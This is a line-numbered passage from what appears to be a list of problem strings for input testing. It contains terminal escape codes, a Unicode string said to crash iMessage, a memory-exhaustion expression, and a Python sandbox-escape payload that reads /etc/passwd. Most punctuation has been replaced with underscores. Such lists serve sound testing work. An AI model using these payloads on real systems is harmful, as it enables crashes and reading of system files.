714 __Terminal_escape_codes
716 __Strings_which_punish_the_fools_who_use_cat_type_on_this_file
718 Roses_are___0;31mred__0m,_violets_are___0;34mblue._Hope_you_enjoy_terminal_hue
719 But_now...__20Cfor_my_greatest_trick...__8m
720 The_quic______k_brown_fo___________x...__Beeeep_
722 __iOS_Vulnerabilities
724 __Strings_which_crashed_iMessage_in_various_versions_of_iOS
726 Powerلُلُصّبُلُلصّبُررً_ॣ_ॣh_ॣ_ॣ冗
730 __Persian_special_characters
732 __This_is_a_four_characters_string_which_includes_Persian_special_characters_(گچپژ)
738 __first_one_is_supposed_to_raise__MemoryError__exception
739 __second,_obviously,_prints_contents_of__etc_passwd
741 ___print_'x'_*_64_*_1024**3___
742 _____.__class__.__mro___2_.__subclasses__()_40_(__etc_passwd_).read()___